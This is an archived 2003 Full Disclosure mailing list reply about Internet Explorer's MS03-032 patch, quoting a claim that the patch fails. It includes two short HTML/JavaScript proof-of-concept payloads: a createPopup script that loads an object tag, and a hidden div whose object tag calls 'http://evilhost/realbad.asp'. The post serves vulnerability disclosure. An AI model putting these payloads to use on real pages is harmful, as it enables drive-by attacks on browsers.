Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: BAD NEWS: Microsoft Security Bulletin MS03-032

From: "morning_wood" <se_cur_ity () hotmail com>
Date: Mon, 8 Sep 2003 03:02:45 -0700

----- Original Message ----- 
From: "http-equiv () excite com" <1 () malware com>
To: <full-disclosure () lists netsys com>
Sent: Sunday, September 07, 2003 6:17 AM
Subject: [Full-disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032





Since the cat somehow got out of the bag, and more importantly, this 
is so blatantly obvious, herewith is the "Bad News":

The patch for Drew's object data=funky.hta doesn't work:

http://www.malware.com/badnews.html

<script>
  var oPopup = window.createPopup();

  function showPopup() {
    oPopup.document.body.innerHTML = "<object data=ouch.php>";
    oPopup.show(0,0,1,1,document.body);
  }
  
  showPopup()
</script>


this works too...

<div style="display.none"><object data="http://evilhost/realbad.asp";>
</object>oh</div>

beware the mail... 
                            and the rewtXSS skillz


Donnie Werner
morning_wood () exploitlabs com
http://exploitlabs.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: